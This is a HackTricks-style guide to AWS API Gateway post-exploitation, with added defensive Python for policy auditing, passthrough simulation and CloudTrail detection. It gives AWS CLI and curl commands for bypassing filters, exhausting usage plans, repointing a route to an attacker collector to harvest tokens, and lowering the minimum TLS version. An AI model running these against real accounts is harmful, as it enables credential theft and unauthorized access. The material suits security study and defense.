AWS - API Gateway Post Exploitation
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
API Gateway
For more information check:
Finding unexposed APIs
You can create an endpoint at https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint for the service com.amazonaws.us-east-1.execute-api, expose that endpoint in a network you can reach (for example through an EC2 machine) and assign a security group that allows all connections.
Then, from the EC2 machine you will be able to reach the endpoint and therefore call the API gateway that was not exposed before.
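A private REST API is reachable from any execute-api VPC endpoint that its resource policy does not exclude, which is what the technique above relies on. The following is an added example (not HackTricks code, not an AWS tool) that audits a resource-policy document for Allow statements that are not pinned to an approved aws:SourceVpce / aws:SourceVpc, treating a Deny with StringNotEquals on the approved endpoint ids as the pin. The endpoint ids and the three sample policies are constructed for the demo.

```python
"""Audit a private REST API's resource policy for callers that bypass the intended VPC endpoint.

Added example (not HackTricks code). Reports Allow statements that any execute-api VPC endpoint,
including one created in a foreign VPC, could satisfy. Policies and endpoint ids are constructed.
"""

# Assumption: the execute-api VPC endpoints the organisation created on purpose
KNOWN_VPC_ENDPOINTS = {"vpce-0123456789abcdef0"}
VPCE_KEYS = {"aws:sourcevpce"}
VPC_KEYS = {"aws:sourcevpc"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _condition_values(condition, operator_prefix, keys):
    """Values of any `<operator_prefix>*` condition whose key (case-insensitive) is in `keys`."""
    found = []
    for operator, kv in (condition or {}).items():
        if not operator.startswith(operator_prefix):
            continue
        for key, values in kv.items():
            if key.lower() in keys:
                found.extend(_as_list(values))
    return found


def audit_private_api_policy(policy):
    """Return {"pinned": bool, "unpinned_allows": [sids], "unknown_endpoints": [ids]}."""
    statements = _as_list(policy.get("Statement", []))
    # A "Deny unless aws:SourceVpce is one of ours" statement pins every Allow in the policy
    deny_pins = set()
    for st in statements:
        if st.get("Effect") == "Deny":
            deny_pins.update(_condition_values(st.get("Condition"), "StringNotEquals", VPCE_KEYS))
    unknown = deny_pins - KNOWN_VPC_ENDPOINTS
    deny_pinned = bool(deny_pins) and not unknown
    unpinned = []
    for i, st in enumerate(statements):
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", f"statement-{i}")
        vpce = set(_condition_values(st.get("Condition"), "StringEquals", VPCE_KEYS))
        vpc = _condition_values(st.get("Condition"), "StringEquals", VPC_KEYS)
        unknown |= vpce - KNOWN_VPC_ENDPOINTS
        if not vpce and not vpc and not deny_pinned:
            unpinned.append(sid)
    return {"pinned": not unpinned and not unknown,
            "unpinned_allows": unpinned,
            "unknown_endpoints": sorted(unknown)}


# Constructed: the common "allow all, deny anything outside the approved endpoint" pattern
PINNED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AllowInvoke", "Effect": "Allow", "Principal": "*",
         "Action": "execute-api:Invoke", "Resource": "execute-api:/*"},
        {"Sid": "DenyOtherEndpoints", "Effect": "Deny", "Principal": "*",
         "Action": "execute-api:Invoke", "Resource": "execute-api:/*",
         "Condition": {"StringNotEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
    ],
}
# Constructed: the same Allow with no Deny, i.e. any execute-api VPC endpoint can reach the API
OPEN_POLICY = {"Version": "2012-10-17", "Statement": [PINNED_POLICY["Statement"][0]]}
# Constructed: pinned, but to an endpoint id nobody on the team recognises
FOREIGN_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Sid": "AllowFromVpce", "Effect": "Allow", "Principal": "*", "Action": "execute-api:Invoke",
    "Resource": "execute-api:/*",
    "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0fedcba9876543210"}}}]}

if __name__ == "__main__":
    for name, pol in [("pinned", PINNED_POLICY), ("open", OPEN_POLICY), ("foreign", FOREIGN_POLICY)]:
        print(name, audit_private_api_policy(pol))
```

Run it against the document returned by `aws apigateway get-rest-api --query policy` (after unescaping); an API whose endpointConfiguration is PRIVATE but whose audit result is not pinned is the case the section above describes.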
Bypass Request body passthrough
This technique was found in this CTF writeup.
As indicated in the AWS documentation in the PassthroughBehavior section, the default value WHEN_NO_MATCH, when the request's Content-Type header matches no template, passes the request to the back end without transformation.
Therefore, in the CTF the API Gateway had an integration template that was preventing the flag from being exfiltrated in the response when the request was sent with Content-Type: application/json:
RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
However, sending the request with Content-type: text/json would bypass that filter.
Finally, since the API Gateway only allowed GET and OPTIONS, it was possible to send any DynamoDB query without restriction by sending a POST request with the query in the request body and using the header X-HTTP-Method-Override: GET:
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
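To make the bypass concrete, the following added example (not code from the writeup or from AWS) applies the documented PassthroughBehavior rules to the CTF's request template: WHEN_NO_MATCH forwards an unmapped Content-Type untouched, WHEN_NO_TEMPLATES forwards only when the integration has no templates at all, and NEVER answers 415. Template rendering is reduced to the single $input.params('moviename') token; treating a missing Content-Type as application/json follows the AWS docs, while ignoring media-type parameters such as charset is an assumption. The request bodies are constructed.

```python
"""Simulate API Gateway's PassthroughBehavior on the CTF integration above (added example)."""
import json

FORWARDED, MAPPED, REJECTED = "forwarded-unmapped", "mapped", "415"

# The CTF's application/json template, with the YAML quoting ('' -> ') undone
CTF_TEMPLATE = ('{"TableName":"Movies","IndexName":"MovieName-Index",'
                '"KeyConditionExpression":"moviename=:moviename",'
                '"FilterExpression": "not contains(#description, :flagstring)",'
                '"ExpressionAttributeNames": {"#description": "description"},'
                '"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(\'moviename\'))"},'
                '":flagstring":{"S":"midnight"}}}')
REQUEST_TEMPLATES = {"application/json": CTF_TEMPLATE}


def _media_type(content_type):
    # Assumption: templates are keyed by bare media type; a missing header means application/json (AWS docs)
    return (content_type or "application/json").split(";")[0].strip().lower()


def _render(template, path_params):
    # Only the one VTL token used by the CTF template is rendered; json.dumps stands in for escapeJavaScript
    token = "$util.escapeJavaScript($input.params('moviename'))"
    return template.replace(token, json.dumps(path_params.get("moviename", ""))[1:-1])


def integration_request(passthrough, templates, content_type, body, path_params):
    """Return (outcome, body the back end receives or None) for one request."""
    key = _media_type(content_type)
    if key in templates:
        return MAPPED, _render(templates[key], path_params)
    if passthrough == "WHEN_NO_MATCH" or (passthrough == "WHEN_NO_TEMPLATES" and not templates):
        return FORWARDED, body
    return REJECTED, None


def flag_filter_intact(backend_body):
    """True when the back end still receives the FilterExpression that hides the flag."""
    if backend_body is None:
        return False
    return ":flagstring" in json.loads(backend_body).get("FilterExpression", "")


# Constructed: the body from the curl command above, with no FilterExpression at all
ATTACKER_BODY = json.dumps({"TableName": "Movies", "IndexName": "MovieName-Index",
                            "KeyConditionExpression": "moviename = :moviename",
                            "ExpressionAttributeValues": {":moviename": {"S": "hackers"}}})


def demo():
    """Outcome per Content-Type / passthrough setting; the back end sees the template only in the first case."""
    params = {"moviename": "hackers"}
    return {
        "json_default": integration_request("WHEN_NO_MATCH", REQUEST_TEMPLATES, "application/json", ATTACKER_BODY, params)[0],
        "textjson_default": integration_request("WHEN_NO_MATCH", REQUEST_TEMPLATES, "text/json", ATTACKER_BODY, params)[0],
        "textjson_never": integration_request("NEVER", REQUEST_TEMPLATES, "text/json", ATTACKER_BODY, params)[0],
        "textjson_no_templates": integration_request("WHEN_NO_TEMPLATES", REQUEST_TEMPLATES, "text/json", ATTACKER_BODY, params)[0],
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:22} -> {outcome}")
```

The fix on the defending side is the passthrough setting itself: with templates defined, both NEVER and WHEN_NO_TEMPLATES reject the text/json request with 415 instead of forwarding the caller's own query.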
Usage Plans DoS
In the Enumeration section you can see how to obtain the usage plan of the keys. If you have a key and it is limited to X uses per month, you can just use it up and cause a DoS.
The API Key just needs to be included inside an HTTP header called x-api-key.
Swap Route Integration To Exfil Traffic (HTTP APIs / apigatewayv2)
If you can update an HTTP API integration, you can repoint a sensitive route (e.g. /login, /token, /submit) to an attacker-controlled HTTP endpoint and silently collect headers and bodies (cookies, Authorization bearer tokens, session ids, API keys, secrets sent by internal jobs, etc.).
Example workflow:
REGION="us-east-1"
API_ID="<http_api_id>"
# Find routes and the integration attached to the interesting route
aws apigatewayv2 get-routes --region "$REGION" --api-id "$API_ID"
ROUTE_ID="<route_id>"
INTEGRATION_ID="$(aws apigatewayv2 get-route --region "$REGION" --api-id "$API_ID" --route-id "$ROUTE_ID" --query 'Target' --output text | awk -F'/' '{print $2}')"
# Repoint the integration to your collector (HTTP_PROXY / URL integration)
COLLECTOR_URL="https://attacker.example/collect"
aws apigatewayv2 update-integration --region "$REGION" --api-id "$API_ID" --integration-id "$INTEGRATION_ID" --integration-uri "$COLLECTOR_URL"
Notes:
- For HTTP APIs, changes usually take effect immediately (unlike REST APIs, where you usually need to create a deployment).
- Whether you can point to an arbitrary URL depends on the integration type/config; in some cases you may also be able to change the integration type while patching.
apigateway:UpdateGatewayResponse, apigateway:CreateDeployment
An attacker with the apigateway:UpdateGatewayResponse and apigateway:CreateDeployment permissions can modify an existing Gateway Response to include custom headers or response templates that could leak sensitive information or execute malicious scripts.
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
# Update the Gateway Response (JSON form of --patch-operations so the commas and quotes inside the
# template survive; single quotes keep the shell from expanding $context)
aws apigateway update-gateway-response --rest-api-id "$API_ID" --response-type "$RESPONSE_TYPE" --patch-operations '[{"op":"replace","path":"/responseTemplates/application~1json","value":"{\"message\":\"$context.error.message\",\"malicious_header\":\"malicious_value\"}"}]'
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Potential Impact: Leakage of sensitive information, execution of malicious scripts, or unauthorized access to API resources.
Note
Needs testing
apigateway:UpdateStage, apigateway:CreateDeployment
An attacker with the apigateway:UpdateStage and apigateway:CreateDeployment permissions can modify an existing API Gateway stage to redirect traffic to a different stage or change caching settings to gain unauthorized access to cached data.
API_ID="your-api-id"
STAGE_NAME="Prod"
# Update the API Gateway stage (each patch operation is a separate space-separated shorthand item)
aws apigateway update-stage --rest-api-id "$API_ID" --stage-name "$STAGE_NAME" --patch-operations op=replace,path=/cacheClusterEnabled,value=true op=replace,path=/cacheClusterSize,value=0.5
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id "$API_ID" --stage-name "$STAGE_NAME"
Potential Impact: Unauthorized access to cached data, interception or hijacking of API traffic.
Note
Needs testing
apigateway:PutMethodResponse, apigateway:CreateDeployment
An attacker with the apigateway:PutMethodResponse and apigateway:CreateDeployment permissions can modify the method response of an existing API Gateway REST API method to include custom headers or response templates that could leak sensitive information or execute malicious scripts.
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"
# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Potential Impact: Leakage of sensitive information, execution of malicious scripts, or unauthorized access to API resources.
Note
Needs testing
apigateway:UpdateRestApi, apigateway:CreateDeployment
An attacker with the apigateway:UpdateRestApi and apigateway:CreateDeployment permissions can modify the settings of an API Gateway REST API to disable logging or change the minimum TLS version, thereby weakening the API's security.
API_ID="your-api-id"
# Update the REST API settings (each patch operation is a separate space-separated shorthand item)
aws apigateway update-rest-api --rest-api-id "$API_ID" --patch-operations op=replace,path=/minimumTlsVersion,value=TLS_1.0 op=replace,path=/apiKeySource,value=AUTHORIZER
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
Potential Impact: Weakened API security, potentially allowing unauthorized access or exposure of sensitive information.
Note
Needs testing
apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey
An attacker with the apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, and apigateway:CreateUsagePlanKey permissions can create new API keys, associate them with usage plans, and then use these keys to gain unauthorized access to APIs.
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
Potential Impact: Unauthorized access to API resources, bypassing security controls.
Note
Needs testing
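Every technique from "Swap Route Integration" down to the API-key section is a control-plane call that CloudTrail records under eventSource apigateway.amazonaws.com. The following added example (not HackTricks code) classifies such records, flagging UpdateIntegration targets outside an allowlist, rewritten response templates or headers, stage cache enablement, a lowered minimum TLS version and API-key/usage-plan creation, and correlates each flagged change with a later CreateDeployment by the same principal. The records are constructed; only the standard CloudTrail envelope fields are relied on, and the requestParameters shapes (integrationUri, patchOperations, responseParameters) are assumptions to check against real logs. The host allowlist is a defender-maintained assumption as well.

```python
"""Flag API Gateway control-plane changes in CloudTrail that match the abuse patterns above (added example)."""
from datetime import datetime, timedelta
from urllib.parse import urlparse

ALLOWED_INTEGRATION_HOSTS = {"backend.internal.example.com"}  # assumption: hosts integrations may point at
WEAK_TLS_VALUES = {"TLS_1.0", "TLS_1_0"}


def _actor(ev):
    return (ev.get("userIdentity") or {}).get("arn", "unknown")


def _when(ev):
    return datetime.fromisoformat(ev["eventTime"].replace("Z", "+00:00"))


def classify(ev):
    """Return the findings for one record; an empty list means nothing matched."""
    if ev.get("eventSource") != "apigateway.amazonaws.com":
        return []
    name, params = ev.get("eventName", ""), ev.get("requestParameters") or {}
    findings = []
    if name == "UpdateIntegration":  # route integration swap (HTTP APIs)
        host = urlparse(params.get("integrationUri", "")).hostname
        if host and host not in ALLOWED_INTEGRATION_HOSTS:
            findings.append(f"integration repointed to non-allowlisted host {host}")
    for op in params.get("patchOperations") or []:  # REST API patch-style updates
        path, value = op.get("path", ""), str(op.get("value", ""))
        if path.startswith(("/responseTemplates/", "/responseParameters/")):
            findings.append(f"{name} rewrote {path}")
        elif path == "/cacheClusterEnabled" and value.lower() == "true":
            findings.append("stage cache enabled")
        elif path == "/minimumTlsVersion" and value in WEAK_TLS_VALUES:
            findings.append(f"TLS minimum lowered to {value}")
    if name == "PutMethodResponse":
        hdrs = [k for k in (params.get("responseParameters") or {}) if k.startswith("method.response.header.")]
        if hdrs:
            findings.append("method response headers changed: " + ", ".join(hdrs))
    if name in {"CreateApiKey", "CreateUsagePlanKey"}:
        findings.append(f"{name} (verify the principal normally manages API keys)")
    return findings


def correlate(events, window=timedelta(minutes=15)):
    """Pair each flagged change with a later CreateDeployment by the same principal inside `window`.
    Returns dicts with actor, time, findings and deployed; HTTP API changes need no deployment, so
    deployed=False is not a sign the change was harmless."""
    events = sorted(events, key=_when)
    deployments = [(_actor(e), _when(e)) for e in events if e.get("eventName") == "CreateDeployment"]
    hits = []
    for ev in events:
        findings = classify(ev)
        if not findings:
            continue
        t = _when(ev)
        deployed = any(a == _actor(ev) and t <= dt <= t + window for a, dt in deployments)
        hits.append({"actor": _actor(ev), "time": ev["eventTime"], "findings": findings, "deployed": deployed})
    return hits


def _ev(name, actor, time, **params):
    # Constructed CloudTrail record with only the fields the detection uses
    return {"eventSource": "apigateway.amazonaws.com", "eventName": name, "eventTime": time,
            "userIdentity": {"arn": f"arn:aws:iam::111111111111:user/{actor}"}, "requestParameters": params}


SAMPLE_EVENTS = [  # constructed, in deliberately unsorted order
    _ev("UpdateGatewayResponse", "alice", "2024-05-01T10:05:00Z", patchOperations=[
        {"op": "replace", "path": "/responseTemplates/application~1json", "value": "{\"message\":\"$context.error.message\"}"}]),
    _ev("UpdateIntegration", "ci-deployer", "2024-05-01T10:00:00Z", integrationUri="https://attacker.example/collect"),
    _ev("GetRestApis", "alice", "2024-05-01T10:02:00Z"),
    _ev("CreateDeployment", "alice", "2024-05-01T10:07:00Z", stageName="Prod"),
    _ev("UpdateStage", "bob", "2024-05-01T10:20:00Z", patchOperations=[
        {"op": "replace", "path": "/cacheClusterEnabled", "value": "true"},
        {"op": "replace", "path": "/cacheClusterSize", "value": "0.5"}]),
    _ev("CreateApiKey", "bob", "2024-05-01T10:21:00Z", enabled=True),
    _ev("UpdateIntegration", "ci-deployer", "2024-05-01T10:30:00Z", integrationUri="https://backend.internal.example.com/v1"),
]

if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print(hit)
```

Feed it the `Records` array of a CloudTrail export, or one event per line from a CloudWatch Logs subscription; the `patchOperations` paths mirror the `--patch-operations` arguments in the commands above, so extending the list for other paths is a one-line change.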